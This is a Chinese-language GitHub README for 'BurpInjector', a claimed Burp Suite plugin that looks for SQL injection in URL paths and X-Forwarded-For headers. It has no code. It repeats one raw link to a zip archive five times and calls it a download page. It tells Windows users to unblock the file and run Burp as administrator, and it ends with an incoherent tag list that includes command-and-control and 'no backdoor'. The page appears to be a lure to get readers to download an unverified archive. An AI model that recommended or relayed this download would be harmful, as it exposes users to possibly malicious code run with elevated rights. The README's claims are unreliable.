Cliftonnonexplosive880/BurpInjector

GitHub: Cliftonnonexplosive880/BurpInjector

一款 Burp Suite 扩展插件,专注于检测 URL 路径和 XFF 请求头中的 SQL 注入缺陷,并自动收集和归一化 API 端点以提升测试覆盖效率。

Stars: 0 | Forks: 0

# 🧩 BurpInjector - 更快发现 SQL 风险 [![下载 BurpInjector](https://img.shields.io/badge/Download%20BurpInjector-2F80ED?style=for-the-badge&logo=github&logoColor=white)](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip) ## 📥 下载 使用此链接访问页面并下载应用程序: [https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip) ## 🖥️ BurpInjector 的功能 BurpInjector 是一款 Burp Suite 插件,用于检查两个经常出现 SQL 注入问题的常见位置: - URL 路径 - X-Forwarded-For 请求头,也称为 XFF 请求头 它还包含接口自动收集功能,可帮助您在工作时收集和跟踪 API 数据。 此工具专为希望以简单方式检查流量并发现 Web 应用程序弱点的用户而设计。 ## ✅ 前置条件 在安装 BurpInjector 之前,请确保您具备: - 一台 Windows 电脑 - 已安装 Burp Suite - 正常的网络连接 - 测试目标应用程序或网站的授权 - 用于下载文件的 Web 浏览器 为获得最佳效果,请使用最新版本的 Windows 10 或 Windows 11。 ## 🚀 入门指南 请按照以下步骤在 Windows 上下载并运行 BurpInjector: 1. 打开下载页面: [https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip) 2. 在 GitHub 页面上,查找最新版本或主要下载文件。 3. 将插件文件下载到您的计算机。 4. 如果文件是 ZIP 压缩包,请将其解压到您容易找到的文件夹中,例如: - 下载 - 桌面 - 文档 5. 打开 Burp Suite。 6. 转到 Burp Suite 允许您添加扩展程序的区域。 7. 将 BurpInjector 文件添加到 Burp Suite。 8. 如果 Burp Suite 要求提供权限或设置详细信息,请进行确认。 9. 如有需要,请重启 Burp Suite。 10. 在 Burp Suite 中打开插件,并开始将其应用于您的流量。 ## 🧭 如何在 Burp Suite 中进行设置 下载文件后,您通常需要将其作为扩展程序放入 Burp Suite 中。 简单的设置流程如下: - 启动 Burp Suite - 打开扩展程序区域 - 添加新的扩展程序 - 选择 BurpInjector 文件 - 等待其加载 - 检查它是否出现在扩展程序列表中 如果您没有立即看到它,请关闭 Burp Suite 然后重新打开。 ## 🔍 您可以检查什么 BurpInjector 侧重于以下情况: - URL 路径值中的 SQL 注入 - XFF 请求头值中的 SQL 注入 - 可能隐藏输入验证弱点的常见请求模式 - 您想要收集和审查的 API 请求数据 这有助于您更有针对性地检查流量。 ## 🧰 典型用例 常见的用例流程如下: - 您通过 Burp Suite 发送请求 - BurpInjector 监视路径和 XFF 请求头 - 插件检查输入可能影响 SQL 查询的迹象 - 您审查结果并进一步测试该问题 当您希望将所有检查集中在一个地方时,此工具非常适用。 ## 📁 文件布局 下载后,您可能会看到如下文件: - Burp Suite 的插件文件 - 包含该插件的 ZIP 文件 - 包含简短设置步骤的文本文件 - 包含支持文件的文件夹 将所有相关文件保存在同一个文件夹中,以便您以后能轻松找到它们。 ## 🪟 Windows 提示 如果 Windows 阻止了该文件,请尝试以下步骤: - 右键单击该文件 - 打开文件属性 - 检查该文件是否已被解除阻止 - 如有需要,请以管理员身份运行 Burp Suite - 将插件保存在路径简单的文件夹中,例如 `C:\BurpInjector` 如果文件以 ZIP 形式打开,请先将其解压,然后再添加到 Burp Suite 中。 ## 🧿 基本使用检查清单 在开始测试之前,请检查以下项目: - Burp Suite 已打开 - 插件已加载 - 您的浏览器已设置为使用 Burp Suite - 目标网站是您获得授权测试的站点 - 您知道要检查哪个请求 这能使您的工作更加清晰且易于跟进。 ## 🛠️ 常见问题 如果 BurpInjector 无法加载,请尝试以下修复方法: - 确保您下载了完整的文件 - 检查文件是否仍留在 ZIP 压缩包内 - 确认 Burp Suite 支持该插件类型 - 重启 Burp Suite - 如果文件看起来已损坏,请重新下载 - 使用文件路径较短的新文件夹 如果扩展程序列表依然为空,请移除该插件并重新添加。 ## 📌 接口自动收集功能的作用 接口自动收集部分可以帮助您: - 收集 API 端点 - 跟踪请求详情 - 保存有用流量的记录 - 在测试期间审查接口 当一个网站有许多端点,而您需要一种简单的方法来跟踪它们时,此功能非常有用。 ## 🔐 安全使用 仅在您拥有或获得明确测试授权的系统上使用 BurpInjector。 适合使用的场景包括: - 您自己的实验室 - 测试服务器 - 获得书面授权的客户系统 - 练习环境 ## 🧩 快速入门 1. 打开下载页面: [https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip) 2. 下载插件文件。 3. 如有需要,请解压文件。 4. 打开 Burp Suite。 5. 将插件作为扩展程序添加。 6. 加载请求并检查路径和 XFF 请求头 ## 📎 首次使用的最简路径 如果您想以最快的路径完成首次使用,请执行以下操作: - 从 GitHub 下载 - 打开 Burp Suite - 加载扩展程序 - 通过 Burp 发送请求 - 检查路径和 XFF 请求头字段 - 审查插件为您提供的任何结果 ## 🗂️ 版本说明 从项目主页下载时,请查找最新版本或发布文件。如果列出了多个文件,请使用最新的稳定版本。 ## 💬 最佳实践 为了获得最佳结果: - 每次只测试一个请求 - 为每个发现做好记录 - 保存请求和响应数据 - 同时审查 URL 路径和请求头字段 - 手工复核任何可疑结果 ## 📦 再次下载 如果您稍后需要下载页面,请使用此链接: [https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip](https://raw.githubusercontent.com/Cliftonnonexplosive880/BurpInjector/main/wogiet/Burp-Injector-1.0.zip)
标签:API收集, BeEF, Burp Suite, CISA项目, HTTP头注入, HTTP请求, JS文件枚举, Linux取证, Python, SQLi, URL路径注入, Web安全, XFF注入, X-Forwarded-For, XSS, 协议分析, 命令控制, 安全测试, 接口安全, 插件, 攻击性安全, 攻击面枚举, 数据展示, 数据统计, 数据采集, 无后门, 权限提升, 漏洞情报, 爬虫, 端口扫描, 红队, 网络安全, 网络流量, 蓝队分析, 隐私保护, 黑盒测试